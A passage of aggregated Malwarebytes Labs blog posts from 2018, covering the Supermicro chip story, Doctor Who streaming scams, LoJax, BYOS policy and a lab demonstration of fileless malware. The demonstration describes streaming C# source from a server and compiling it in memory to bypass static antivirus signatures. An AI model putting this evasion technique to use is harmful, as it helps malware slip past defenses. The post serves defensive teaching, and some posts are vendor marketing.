The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bloomberg blunder highlights supply chain risks

Malwarebytes - Wed, 10/10/2018 - 16:00

Ooh boy! Talk about a back-and-forth, he said, she said story!

No, we’re not talking about that Supreme Court nomination. Rather, we’re talking about Supermicro. Supermicro manufacturers the type of computer hardware that is used by technology behemoths like Amazon and Apple, as well as government operations such as the Department of Defense and CIA facilities. And it was recently reported by Bloomberg that Chinese spies were able to infiltrate nearly 30 US companies by compromising Supermicro—and therefore our country’s technology supply chain.

If you’ve been trying to follow the story, it may feel a bit like this:

What do we know so far

On October 4, Bloomberg Businessweek detailed a narrative regarding Chinese government influence into the operations of US-based hardware manufacturer Super Micro Computer, Inc., or simply Supermicro. The article was produced using information from 17 different anonymous sources including “one from a Chinese foreign ministry,” and draws on research spanning more than three years of investigations.

The article alleges that operatives from a unit of the People’s Liberation Army used a method known as seeding to compromise the Supermicro supply chain. They did this by coercing Chinese-based subcontractors responsible for the creation of the hardware circuitry to secretly install a high-tech spying chip into the motherboards and systems of computers destined for high-profile customers.

Bloomberg suggests the access by top-level operatives allowed the Chinese government to conduct a highly-targeted and highly-complex spying operation against worldwide organizations and in all sectors of business, including finance, health, government, and private.

That little chip is what the Bloomberg article says is responsible.

According to the article, the problem stems from a tiny microchip, not any bigger than a pencil tip, and that had been embedded to the electronic circuitry of compromised devices. Though the intent of the microchip remains uncertain, the article suggests it was capable of communicating with anonymous computers on the Internet and loading new code to the device operating system.

In at least one case, the malicious microchips are alleged to be thin enough as to be embedded in between the layers of fiberglass onto which the other components were attached.

The malicious microchip can be embedded between layers of hardware fiberglass.

The chips have the ability of being able to modify the instructions between the operating system and CPU, and can allow for code injection or other data-alteration techniques. The code has also created a stealth doorway into the networks of altered machines.

Or as Bloomberg put it:

The implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard. This happened at a crucial moment, as small bits of the operating system were being stored in the board’s temporary memory en route to the server’s central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

Talk about some deep-state, James Bond–level stuff.

Here, we have a story detailing illicit government operations and covert operatives who have systematically compromised the supply chain of one of the world’s largest motherboard and custom hardware manufacturers. Threat actors have accomplished this using a deeply-technical and highly-targeted—not to mention a nearly impossible mechanism to detect—hardware attack utilizing incredibly small, sophisticated microchips that are embedded between the individual hardware fiberglass layers.

And why did they do it? To initiate clandestine spying operations against some of the worlds’ largest entities in order to exfiltrate sensitive intellectual property and top-secret government information.

Quick, call a Hollywood director. I have a story to pitch!

This is indeed a fantastic story filled with all sorts of nail-biting suspense and adventure, but just like any good Hollywood caper, we have to ask ourselves: Is there any truth to it? We imagine that when storytellers got a whiff of this tale, they did something like this:

Did that really happen?

One problem with verifying this story is that this type of attack isn’t detectable by any security solution. Right now, no one can detect hardware-level modifications using custom hardware solutions that have been systematically installed at the manufacturer level. That kind of detection protocol just doesn’t exist yet.

Another problem: Aside from the S.O.C.-generated network logs pointing fingers at compromised machines and vulnerable networks—for which the article said there were none—no one can prove or disprove this story.

Few security researchers are going to have access to the $100,000+ computers where these chips are said to reside. And even fewer of those researchers work for organizations that will let them start analyzing and ripping capacitor-looking circuits from the board. So basically, we’re left having to trust the anonymous sources used for the report.

This state of unknown even led well-known Google security researcher Tavis Ormandy to liken the event to the chemtrails conspiracy theory and the hunt for Sasquatch.

In the days since Bloomberg’s publication of the story, there have been significant rebukes and outright denials from the companies and government agencies cited in the report. Here’s what’s been said:

  • Amazon called the information untrue and doubled down on the statement by saying it was also untrue it had worked with or provided information to the FBI regarding malicious hardware.
  • Apple said they had repeatedly and consistently refuted every aspect of Bloomberg’s story during pre-publication verification efforts, and refute virtually every aspect of the article now.
  • Supermicro denied most, if not all, aspects of the Bloomberg story.
  • China’s Ministry of Foreign Affairs indicated the government intrusion into the product supply chain would violate China’s commitment to the proposal of the 2011 International Code of Conduct for Information Security.
  • And the United States Department of Homeland Security said it had no reason to question denials by US technology companies (though this doesn’t really refute the claims).

To further muddle the information, the only two named technology experts have backpedaled their statements since publication.

Joe Grand, cited hardware hacker and founder of Grand Idea Studio, Inc., claimed in a recent Twitter post that his quote was given over a year ago and broadly relating to the ultimate story.

In a fascinating podcast on, Joe Fitzpatrick, founder of Hardware Security Resources, expressed concerns regarding the accuracy of the reporting, and claims his statements were taken out of context. In an email exchange provided by Fitzpatrick and read aloud on the podcast, Fitzpatrick expresses skepticism to Bloomberg reporters over the financial cost and scalability of the device.

“The whole setup doesn’t really make sense,” the email is quoted as saying. “It just doesn’t make sense to spend the time and money to do what you are describing. Are you sure that the person who did the analysis had actual hardware knowledge and understanding?” Fitzpatrick concludes, “I’m incredibly skeptical.”

So basically, all of the reporting on this story fell apart post-publication, and everyone involved has denied the aspects of the story. Oops!

Supply chain attacks are real

Even though Bloomberg may (or may not) have got the details wrong on this one, the scenario the story brings up is entirely plausible—though maybe not with the sensationalism portrayed in the article. In fact, supply chain compromises, hardware faults, and outright counterfeits are not at all uncommon. There have been numerous events across the globe that highlight the dangers that audit-free software and single points of failure can introduce.

Just last year, the popular Ukrainian tax software Medoc was subject to a compromised update that went out automatically to millions of customers. The attack resulted in the distribution of the EternalPetya ransomware.

Earlier this year, popular PC cleaner CCleaner was victim of an advanced APT backdoor that came as part of a software supply chain attack. In this multi-thronged attack, threat actors infected 2.27 million users in the first stage. After analyzing the collected information for high-value targets, only 40 were chosen for second-stage attacks and additional espionage efforts. This type of concentrated effort shows the extent attackers are willing to go to infect high-value and potentially lucrative industries and organizations.

Let’s also not forget that Edward Snowden detailed an NSA program that alleged backdoors planted in Cisco products allowed for spying on 20 billion communications each day—or the allegations that the NSA compromised hard drive manufacturers from all over the world to install malware that remained undetected for as long as two decades. Or how Mark Klein detailed secret, unmarked rooms at AT&T from which covert spying operations were being run.

And this doesn’t even touch on the countless vulnerabilities, IOT botnets, default password attacks, or the many other vectors that can be used to launch malware toward systems, peripherals, routers, and other hardware devices we use on a daily basis.

Unfortunately, few of these devices or systems are covered by security solutions that can protect from or remediate the unwanted code and malicious behaviors.

But don’t be fooled. This doom and gloom isn’t just isolated to high-tech computer components and state-sponsored spying. Nor is the problem isolated to components originating from specific geographic regions.

Due to deep supply chains and razor-thin profit margins, consumers face risks every day when at the checkout counter. Consumables can be compromised, either knowingly or not, and with malicious intent or not, in any one of the many downstream transports. This relates to everything from cheap computers and phones purchased from third-party markets all the way down to pet food and lettuce that you buy from your local supermarket. Even the vehicle you drive may have faults attributable to supply-chain issues.

There have been millions of instances where food, phones, computers, manufacturing goods, and virtually every other product known to man have shipped with vulnerabilities or been susceptible to supply-chain tampering.

So what do we do?

Admittedly, that’s a tough nut to crack.

Few in the security industry possess the necessary skills to comprehend—let alone reverse engineer—malicious hardware components that are deliberately designed to look like obscure, legitimate hardware components and are hidden within pin-point modules. And do any of us have the time or desire to understand the inner workings of the devices and systems we purchase? Okay, perhaps a few do.

To make matters worse, there aren’t any security products on the market that have the capability to protect against the sort of sophisticated and targeted attack outlined in the Bloomberg report. To steal a quote from the article: “This stuff is at the cutting edge of the cutting edge, and there is no easy technological solution.”

Regardless of the device or the origin of the product, businesses and consumers alike need to perform due diligence when purchasing devices and products. The risk tolerance may need to be assessed to determine if a particular service or product is worth the potential detriment of losing sensitive information—or other valuable data, time, and peace of mind.

Businesses may wish to conduct hardware security audits on newly-acquired equipment to check for suspicious behavior. IT departments should also consider rolling out updates and patches in staggered succession to monitor for flaws or undesirable effects, thus isolating these problems to a few machines rather than the entire company. And, of course, adopting early technologies should be off-limits for security-conscious enterprises as these products have not yet received the scrutiny of the security community.

How can consumers and businesses truly protect themselves, then? The real answer is “they can’t.” Consumers can never be 100 percent assured the devices and software they buy will be completely harmless.

Without the ability to analyze and reverse-engineer every single device and bit of code that is used, customers have few fail-safe methodologies to ensure their products are free of defect. They must simply research, use common sense, and trust that they’re aligning themselves with products and companies that take the privacy and security of their customers seriously.

Aligning with security best practices, doing due diligence, and conducting a cost/benefit analysis are all good suggestions to follow. But also in this case, maybe crossing your fingers and saying a prayer is just as viable a suggestion.

The post Bloomberg blunder highlights supply chain risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When Endpoint Detection and Response (EDR) is not enough

Malwarebytes - Tue, 10/09/2018 - 15:00

As cybercriminals continue to validate the reality that no prevention-based security control is going to stop every threat every time, companies are expanding beyond prevention-only approaches and closing the gap with endpoint detection and response solutions.

But as we consider this strategy, one pressing question is: How big is the gap? If prevention security isn’t 100 percent effective, how effective is it? A popular perception of businesses is that prevention security is about 98 percent effective with a mere 2 percent of threats slipping by. However, the reality is far worse.

Because our product is most often used for malware remediation on business endpoints, we have extensive telemetry on this gap where current endpoint protection technologies are failing to keep organizations safe. Our data shows that current endpoint protection platform vendor software is approximately 40 percent effective, based on endpoints using Malwarebytes for clean up. That means 60 percent of those endpoints were found to be harboring hidden threats—including Trojans, backdoors, and rootkits.

Framing up the size of the gap is important because it helps organizations prioritize the capabilities they need in their endpoint detection and response (EDR) solution—namely, automated and complete remediation.

Until recently, organizations have turned to EDR to gain greater visibility into what’s happening on endpoints. While helpful and important, visibility doesn’t provide a silver-bullet solution for fast and effective remediation. Incident response (IR) teams still face challenges when managing multiple platforms, chasing false alerts, and manually handling the remediation process.

Lack of visibility into and quick remediation of threats leads to long infection dwell times. In fact, according IR teams interviewed for the 2017 SANS Incident Response Survey, 28 percent report the time from detection to remediation is between 6 to 24 hours. The picture is much more grim in the 2018 Verizon Data Breach Investigations Report, where more than 70 percent of organizations were comprised by a breach within minutes, but discovery of that breach took months for 60 percent of respondents. A further 30 percent took days to contain a breach after discovery and a still solid 10 percent took additional months to get their breach under control.

In addition to dwell time, manual remediation itself is resource-intensive, often involving a lengthy re-imaging process for IR teams, and lots of lost productivity for employees—not to mention the tedious re-installation of end-user applications and customization of personal settings.

There’s a better way.

Breaches are inevitable, and the true size of the prevention gap is much bigger than many realize. As such, remediation capabilities are essential for today’s organizations. To truly close the gap and remediate hidden threats, the “response” portion of EDR solutions need to go beyond alerting to actually fixing the endpoint.

And that’s what we aim to do with Malwarebytes Endpoint Protection and Response. Using a single, unified agent to deliver endpoint protection, detection, and response, our solution effectively alleviates expertise challenges and eliminates the resolution gap. Our product consists of three key components:

1. Prevent

Malwarebytes Endpoint Protection and Response uses a seven-layered, Multi-Vector Protection (MVP) approach, which includes both static and dynamic detection techniques, to seek out a wide range of threats delivered via different attack vectors.

2. Detect

Our solution provides continuous endpoint monitoring and visibility using machine learning anomaly detection combined with aggressive anomaly detection scoring, which is integrated with our cloud sandbox detonation.

3. Respond

Malwarebytes goes beyond alerting and actually fixes the problem with thorough remediation, and even rollback for ransomware infections. Our fast and effective response includes complete removal of infections and artifacts—all with minimized end-user impact.

The result is advanced protection capabilities plus EDR capabilities, packaged with not only visibility into threats but the ability to quickly remediate those threats and fix endpoints.

Malwarebytes isn’t like other security companies. With remediation in our DNA, we do everything in our power to stop attacks before they happen, but we never assume that cybercriminals won’t find a way. That’s why we’ve focused on being the best at finding and removing known and unknown threats.

Learn more about how to remediate threats with Malwarebytes Endpoint Protection and Response.

The post When Endpoint Detection and Response (EDR) is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Avoid these Doctor Who Series 11 scams

Malwarebytes - Mon, 10/08/2018 - 16:39

The new season of Doctor Who has finally landed on television screens around the world, and we’ve started to see the first few signs of spam and other assorted nonsense lumbering online.

A rash of YouTube accounts claiming to offer up the new series are making the rounds, all of which generally lead to the same final destination: a site that claims to offer free membership, but leaves some actual fees buried in the terms and conditions if you presumably want to access the promised content.

If you go hunting for Doctor Who streams at the moment, you’re liable to see a bunch of results similar to the below, posted from multiple accounts. Here are a few advertising episode 1 of the latest series:

Click to enlarge

Here’s one doing the same thing, but with Peter Capaldi in the promo pic instead, and I can let them off with this, seeing as it’s Peter Capaldi.

Click to enlarge

All of them claim to offer up the upcoming Series 11 (even the ones using pictures from older series), but even from the outset, the videos should make you a little bit wary.

For starters, there’s no preview clips of the content. Instead, the videos pop a blink and you’ll miss it promo shot of Doctor Who which is immediately replaced by random upload content.

Click to enlarge

How random? Well, it’s everything from what sounds like mid 2000’s pop music and video game streams to weird spinning graphics and pulsating lights. Essentially, absolutely nothing to do with Doctor Who and everything to do with a solid hour of cut and paste garbage in a bid to evade YouTube copyright detection and/or pad out the video length. Even Love & Monsters didn’t drag on this long.

Click to enlarge

Depending on which spammy YouTube account you start from, you’ll either be given a direct link to one of the supposed Doctor Who content portals or a Bit(dot)ly link for a second site claiming to do the same thing.

From there, you’ll end up on one of a number of cookie-cutter identikit websites, which offer up more glimpses of the new Doctor with a play now button. Here’s one:

Click to enlarge

Wherever you’ve come from, clicking through the continue buttons pops a “Create free account” box. The shot below is from the other site, bestv(dot)online, at the same stage in the process. It may as well be the same website.

Click to enlarge

Note that although “Create free account” is prominent, it does say off to the side that you can “Try this service for free.” A lot of people might assume there’s no cost here, but trying a service for free generally tends to imply charges down the line, perhaps by having to upgrade an account to be able to access anything remotely worthwhile.

We’ve seen lots of websites that look like our final destination down the years; many claim to offer free books, games, videos, and more. Search for the site names online though, and you’ll often find disgruntled users complaining that after joining, they were simply given lists of third-party download sites to try, or links to pirated content like this author claims in the top comment, or (occasionally) not even that.

This one, called “Basilplay,” follows a similar design format for the template if nothing else with liberal splashings of the word “free” all about the place. “Free and unlimited games, books, movies, and more.” “Sign up for free.” “Please create a free account to access unlimited downloads and streaming.”

Click to enlarge

That all sounds very, well, free. Doesn’t it?

If you check the inevitable T&Cs, however, things become a little unclear. They state that there’s a “standard” account that doesn’t cost any money (they still want some payment information at time of registration either way), and a “premium” account, which gives full access to whatever content they claim to be offering. There’s nothing on site that shows the specifics of what you get versus what you don’t get for paying, so you’re effectively signing up with zero idea of what’s on the other side.

Click to enlarge

The premium rolling subscription, according to the T&Cs, is $89.95 a month. Not so much Doctor Who, as Doctor Whoo-boy. For that sort of money I’d also want to know who said “Silence will fall” in the TARDIS.

Click to enlarge

A few of the landing pages seem to be rotating out sites, so you might end up on Basilplay, or you could find yourself materialising on a similar site located elsewhere:

Click to enlarge

Curiously, we revisited the Basilplay site while putting together this blog, and it seems to have taken on a Time Lord–style regeneration of its own:

Click to enlarge

I’m not sure where Doctor Who series 11 has gone, but I don’t think we’re going to be seeing humorous references to reversing the polarity of the neutron flow on a site suddenly all about video games, do you?

Doctor Who has long since become a global brand at this point, and it’s frankly never been easier to catch it on any number of mainstream, legal channels, including purchasing DVDs, streaming, or even just watching it live. In fact, you could really get into the swing of things and Timeshift, which seems highly appropriate.

However you do it, you don’t need to bother with spammy YouTube videos, clickthrough portals, or landing pages that offer books and TV shows one day, but focus on video games the next.

Now that the new series is up and running, you can expect a lot more antics similar to the above across many corners of the Internet. As always, if it seems too good to be true, then do yourself a favour and jump back into the TARDIS. A crack in time is bad enough, but a crack in your bank balance is even worse. 

The post Avoid these Doctor Who Series 11 scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 1 – 7)

Malwarebytes - Mon, 10/08/2018 - 16:31

Last week, Malwarebytes welcomed National Cybersecurity Awareness Month by renewing our pledge to do what we do best: offer the best protection for our customers and promote security awareness for all.

On Labs, we raised the question of whether it is a good idea to bring your own security or not, talked a little bit more about fileless malware, homed in on a malware campaign targeting Fortnite gamers, and looked into LoJack, a bootkit malware that has been targeting government entities.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 1 – 7) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fileless malware: part deux

Malwarebytes - Fri, 10/05/2018 - 15:00

In part one of this series, we focused on an introduction to the concepts fileless malware, providing examples of the problems that we in the security industry face when dealing with these types of attacks. 

In part two, I will be walking through a few demonstrations of fileless malware attacks that I have created. These labs demonstrate the problems we face when trying to detect fileless malware.

I will first start off with a demonstration of malware that is detected strictly with static signatures. The file I will be using is a custom binary, which I created from scratch and does not actually perform malicious activities. It is completely benign.

The reason for using a benign file for the demo is that I do not want any of the other more advanced components of the AV to kick in and try to detect this file. I want to show what happens when we rely purely on static signatures. We have simply created a static signature for this specific binary so that when executed or scanned on any computer running Malwarebytes, it will be detected.

After this test, I will then be testing a legitimate malware via the same fileless methods to illustrate the necessary detection technology that needs to be in place to catch the threat.

Before we begin, I will first cover how static detections work in order to make clear what exactly is being evaded with these fileless methods. Then I will cover some more sophisticated detection methods, which in this modern age of security are the most important components to detect the new and unknown threats.

Static detection

There are a few ways to detect malware statically. The most basic, and frankly, the most useless detection method nowadays is by hashing the file. In this case, there’s a one to one detection rate of signature to malware.

In order to have a single signature cover a lot more ground, modern day static detection engines extract key areas of the binary and allow signatures to be made on specific op-codes or strings within sections of the binary. The best open source example of this would be YARA rules. If you are unfamiliar with YARA, please take a minute to look it up as it is a valuable tool for malware analysis.

Below is an example of a detection using YARA. The example rule is completely random and not made to detect any malware.

rule ExampleDetection { strings: $hex_string = { AA (BB | CC) [3] FF [2-4] 00 }   $string1 = “malString” wide ascii fullword   $hex2 = {CC DD 33 DD}   condition:   $hex_string and #string1 > 3 and $hex2 at entrypoint and filesize > 200KB }

A single rule similar to this, although in the category of static signatures, can detect hundreds or thousands of malware that have similar characteristics. A good static signature still allows you to be dynamic and detect malware even when a writer modifies his code.

But, even though these static detection methods are quite effective in certain cases, there are a few major downfalls. The first and most obvious downfall is if the binary codes and strings are changed beyond what the signature writer took under consideration, the detection will no longer trigger. This is the main reason why antiviruses have added more dynamic methods for detecting sophisticated malware to their solutions. These include behavioral signatures, behavioral detections, heuristics, self-contained emulators, machine learning, and artificial intelligence.

Some of these technologies are included in Malwarebytes’ consumer and business products, and are listed below:

The second downfall to static signatures is what I will be illustrating in this first lab. If there is no binary on disk to run a static signature against, then the static signature has nothing to detect against. So, in short, it fails. This is where the fileless attacks succeed.

In a perfect world, with unlimited computing power, we would theoretically be able to extract every bit of data from memory at all times and run static signatures against then to overcome this downfall. But because performance is always an issue, this is not possible, and static signatures will fail in this scenario. Having said that, I will proceed to the first lab.

Lab 1: Static-only bypass

First, I will run the test detection file manually on a system with Malwarebytes so that we can see the static signatures portion catching the file.

As you can see, the file was detected as Trojan.Vhioureas.POC. Again, this is because I created a test detection on a unique string I made using this simple program. If the program succeeds, it will pop up a calculator application.

Now I will load the same test file using the inception framework: a fileless execution framework.

As you can see, the vhioureasPOC file did not trigger any detection, and Calc popped up. The reason is because the inception framework streamed the malware source completely from a server and executed it purely within memory.

You can see this in the command parameter to UpdateService.exe, which is the inception client loader binary. It pulled the source code of the vhioureasPOC from the server I set up at the address in the URL. The fileless streaming method evaded the static signature engine of the AV.

Inception framework

Before continuing on to Lab 2, I will discuss the inception framework and how it can be used to load any .NET executable in memory. We will start with the server side.

The server side of inception has two main components: the payload generator and the actual malware server. The payload generator takes as an input, a C# source code file, and provides you with a custom URL token for fetching on the client’s side.

After we have generated the payload, when we run the malware server component, we can retrieve the source code in an encoded form via any http request. For example,if we navigate to the URL generated in a browser on our client machine, we will see a long base 64 string in the browser window. This is the payload.

Now moving onto the client side of inception. The client in and of itself is benign. It does not contain any malicious code. It’s simply a command-line tool that takes a URL as input. It fetches whatever is on the end of that URL and attempts to read it in as text, specifically looking for proper formatting of C# source code. It then takes the C# text and, using the operating system’s native compiler, performs run-time compiling purely in memory. It then executes the generated code.

This is how we were able to evade the static detection engine. There is never any point in which the malware code from the server exists on the hard drive. Because of that fact, there is no file for the static engine to scan.

As a side note, I would like to add that in general, no AV detects source code of the compiled language. The reason here is that source code can never run without being compiled, and thus can never cause harm. This is an interesting point because even a network signature, such as snort or any IDS would be unlikely to pick this up. The malicious binary is never streamed, it is only the source code that is streamed. So, it evades all static signatures, even on the network side.

Fighting this threat

Being that we evaded the static engine, modern-day antiviruses as I mentioned earlier must contain technology to dynamically detect malicious activity on the system rather than simply detect malicious signatures.

To test that this technology exists and works properly, we will be running inception once again against the victim machine, only this time it will be with a payload which actually performs malicious functionality to the victim. We should hope that the AV engine has the ability to determine that the execution on the system is malicious based on its activity. This is exactly what we will be testing in Lab 2.

Lab 2: fileless ransomware

For this lab, I will load a source code of a ransomware sample via inception. Essentially, nothing changes from the above steps. Only now, the payload generation on the server side points to a ransomware source code file instead of the POC test.

As you can see, a detection was triggered this time. Although the static engine did not detect the malware, the application behavior portion of the engine stepped in and determined that there was malicious activity on the system that behaved like ransomware, and it triggered the detection. This is why you see it detected as Ransom.Agent.Generic.

Static vs. dynamic

I have created these demonstrations to show some of the problems that fileless malware can cause—mainly that they were able to easily bypass static engines. This doesn’t mean that I believe static signatures do not have their place in malware detection. I am simply showing their weakness when it comes to fileless attack.

Static signatures help researchers properly classify malware families and provide more detailed detections. This is usually because, behind a signature, there is a malware analyst who has spent the time to research and understand the malware’s characteristics. I have seen many situations where a good signature has caught malware that machine learning engine failed to identify. However, when the static detection fails, dynamic detection must take over. This symbiosis is key.

I am of the school of thought that both static and dynamic detection are necessary, and a good mix of both is still extremely valuable. Typically, when an anti-malware vendors uses signatures in addition to next-gen technology in their repertoire, that’s a sign that there are active malware analysts on the other side of the screen.

This gives me a peace of mind—that vendors are not leaving the fight against malware purely up to algorithms and technology. Technology is not quite advanced enough to be left fully in charge, and in the meantime, a mixture of humans and technology, malware analyst and machine, is still the best bet.

Stay tuned for part three of this series, where I will provide a detailed analysis of various fileless malware families.

The post Fileless malware: part deux appeared first on Malwarebytes Labs.

Categories: Techie Feeds

LoJack for computers used to attack European government bodies

Malwarebytes - Thu, 10/04/2018 - 15:00

Security researchers have detected the first known instance of a UEFI bootkit being used in targeted campaigns against government entities across Central and Eastern Europe. The attack focuses on UFEI-enabled computers and relies on a persistence mechanism that has been stolen from a legitimate, but often questioned, software called Computrace that comes by default on many computer systems.

This Computrace agent from Absolute Software is a service designed to recover lost or stolen computers, the underlying technology of which is based on the LoJack Stolen Vehicle Recovery System. In 2005, Absolute Software licensed the LoJack name and subsequent tracking technology to aid in recovery efforts of stolen computers. After negotiations with manufacturers, the Computrace agent from Absolute Software—or LoJack for computers—now comes pre-loaded on a large number of machines.

The Computrace software uses a novel method to maintain persistence on computers. This methodology allows the code to remain through a re-installation of the operating system or replacement of the hard drive. The software does this by tightly integrating into low-level operations that are stored within SPI flash memory modules located on the physical motherboard of the computer. These memory modules are where pertinent system resources, such as BIOS and UFEI procedures, are stored.

An Eset white paper details how Trojanized versions of the Computrace agent have been compromised to allow attackers the ability to execute arbitrary code on vulnerable machines. This code can be stored within the SPI flash modules, which prevents easy detection from many security solutions. This code execution ability, along with the persistence and tracking capabilities of the Computrace software, makes for an extremely effective combination that is difficult to detect or remediate. Eset is calling this threat the LoJax malware.

As of this writing, use of this particular attack methodology appears to be limited in scope. Research indicates that the purpose of this novel attack vector has been to install the XAgent Remote Access Trojan, which others in the security industry have linked to the Russian hacking group that goes by many names including: APT28, Fancy Bear, and Sednit.

The successful execution of the malware payload is dependent upon a computer system that has been configured to disable the Secure Boot protections that come standard on newer Windows computers.

Secure Boot is a security feature of UFEI-enabled computers, and it requires a legitimate digital signature before the system is allowed to execute any code stored within the SPI flash memory module. This is a current limitation of the LoJax malware, as the code does not have a digital signature. This prevents code execution in environments where Secure Boot is enabled, such as Windows 8 and Windows 10.

Users of Linux or other unsupported operating systems will not have the built-in protections of Secure Boot due to incompatibility with those devices. Users who must disable such protections in order to use necessary or desired software will need to remain diligent.

Though currently limited in scope, we anticipate seeing this attack vector employed by other malware families and attackers in the future.

The post LoJack for computers used to attack European government bodies appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bring your own security (BYOS): good idea or not?

Malwarebytes - Tue, 10/02/2018 - 15:00

We’ve talked about the concept of Bring Your Own Device, or BYOD, on the blog before. BYOD is a popular policy whereby employees can bring personally-owned devices, such as laptops, tablets, or smartphones, to work and use them to access data and applications. It helps to cut costs and can increase productivity, but it brings with it many security concerns and implications.

Similar in theory to BYOD is BYOS, or Bring Your Own Security. This method allows employees to choose which security solution they would like to run on their devices. Is this theory a natural evolution of BYOD or does it bring with it more concerns? Do those concerns matter if the device that will be submerged in the company network has its own security software installed?

BYOS concerns

Differences in the security software that runs on corporate systems and BYOS devices can give your IT department a headache—especially if said devices have access to company resources like shared drives. Are there any conflicts between the software on the devices and the security solutions running in the corporate environment? It’s certainly possible.

There could be gaps between the devices’ security programs and corporate systems that attackers could take advantage of. In fact, adding security software to an existing setup does not always enhance security—especially if they are of the same type, such as two large antivirus suites or two free remediation tools. Even worse, you could end up weaker than you were before.

In addition, misconceptions may lead device owners into a false sense of security. For example, some may believe they are protected behind the company’s firewall as soon as they connect to the corporate Wi-Fi, or even as soon as they walk in the door. But is that true?

Let’s look at a few scenarios involving both BYOD and BYOS, their pros and their cons, and the security implications that each scenario brings with it.

The scenarios

To begin jumping into the following scenarios, let’s first set the stage by presenting four possible ways the BYOS policy might be implemented, whether devices are personally owned or issued by the organization. They include:

  • The employee owns the device and has his own security software installed.
  • The employee is issued a company device that she may also use for personal purposes. She gets to choose and install whichever security software she wishes.
  • The employee owns the device, but in order to be allowed to use it for company matters, she must install the company’s choice of security software.
  • The company issues a device that came with its choice of security software installed.

Before we talk these scenarios through one by one, let’s first establish one thing up front: An employee running security software that he did not choose, nor is familiar with, is probably a bad idea. Unless it is a cloud-based product that can be administered from a central location, the employee should get some training on how to optimally use the solution. There is no stronger security for workplaces than user awareness. In fact, we would—and do—advise this no matter what the scenario.

Scenario 1: All on the user

In the first scenario, in which the employee uses his own device and security software, you might say that it’s good for the company to stay out of the way and trust its users. However, when it comes to matters of security for proprietary data, it’s never a good idea to let it all blow in the wind.

It’s easy to say that it would be the employee’s problem if anything were to happen to the data on his device, but what good would that do the company? The information would already be out there, and the loss of data, endpoints, productivity, and reputation would cost much more than a single salary.

As for the employee: Would he even come forward about the leak if the company had no control over his device in the first place? Probably not. The company might be able to trace the infection back to his device, but after how long? How long did information-stealing malware sit and propagate in the network? What sort of secrets will it expose to those willing to pay top dollar on the black market?

This scenario would be the single worst BYOS idea if it weren’t for…

Scenario 2: A rare scenario

In this scenario, the organization issues a device to its employee but expects her to choose her own security program.

This is a rare scenario for good reason. Perhaps a company’s own IT department might have its employees test out different vendors. Perhaps a user only makes phone calls or types up documents on her device, and doesn’t need the Internet to do her job. However, in any other case you’d have to have one trusting organization and one extremely security-wise workforce.

Otherwise, employees might go for the cheapest option if they need to spend their own money—or use a free, limited version instead. Or, if billing the company, they may just grab the only name they know without investigating if it’s a good fit for the device or the user. The only other explanation is that the company cares so little about the security of their devices and networks, that they’re willing to throw away money on them.

Scenario 3: Mostly pro, a little con

This situation calls for the employee to select the device, but the company to prescribe the security setup.

Here, the employee gets to either purchase or be reimbursed for the device she likes with the caveat that she must install security software that meets corporate guidelines. This is mostly a win-win scenario, as the employee gets to use the device she prefers, but the company can be reassured that the device is secure and safe to use in the corporate environment. In an ideal situation, the device can even be monitored by the corporate SIEM or cloud console.

One note on this scenario: While it’s an ideal setup for supplementary devices or remote employees, it might not make the most sense for users’ primary machines. This is because managing a fleet of different devices with different operating systems could get tedious for IT teams, even with the same security protocols followed.

Scenario 4: The company’s choice

The fourth scenario, where the company decides on the device and the security software, is the easiest solution for organizations, but decidedly neither BYOD or BYOS. This sounds more like what an HQ worker might expect to receive from the IT department on the first day of employment.

While easiest to control, it’s also costly—whether the company is providing a single laptop or a supplementary smart phone. In this case, businesses should be prepared to defend against threats encountered by employees doing legitimate work or occasionally using the device for personal reasons, such as online shopping or social media. Companies should essentially treat this more or less the same as when an employee occasionally takes a company laptop home to do some work.

Installing security software on a corporate machine

A completely different scenario is one in which no outside device plays a role. Instead, employees bring their own security into the workplace environment. This does sometimes happen—people install their preferred security software on their work computers of their own initiative. For example, our telemetry tells us that our free consumer remediation product is downloaded and run on many corporate machines, used to clean malware that has slipped through the cracks of their workplace’s official security setup.

What we can’t see in our telemetry is whether this is done by users themselves or by someone from the IT team as an impromptu method to deal with an infection. Although using a free consumer product in a business environment is technically against the rules, it doesn’t pose a direct security risk. It does pose a question for the company’s IT department, however, who would probably like to know which threat managed to wriggle through their net and how.

Regardless, there’s a difference between employees installing free remediation tools for clean-up purposes only and those that install paid-for, active protection on top of network security. In the latter case, the active endpoint security conflicts with the active network software that is controlling the corporate environment. Like two dogs fighting over a bone, and no one wins, because the bone (malware) escapes.

Important considerations

The safest, most efficient way to implement workplace security for both the company and its employees is to come up with a corporate policy. When trying to decide on a BYOD security policy, there are a few points that should at least be considered. They include:

  • Which Operating Systems will you allow? Not every software can cover all the OSes, and if you want to go for uniformity or central management, this is an important issue.
  • Which software will you allow? And if you are going to use restrictions, will you be using a blacklist or a whitelist?
  • How detailed do you want your security policy to be? Are you going to give your employees a general outline or are you really going to drill down into details like minimum requirements for passwords or how to identify phishing emails?
  • Do you want to be able to monitor devices that fall under the BYOD setup from your central management console? And does that require the devices to meet certain specifications?
  • What happens to the devices when the employee leaves the company? Or better yet, what happens to the information, software, and other company-related data on the device?
Best practices

The list of best practices to turn any Bring Your Own Security setup into a successful and secure endeavor looks a lot like the list for any security guidelines, but we want to repeat the advise anyway:

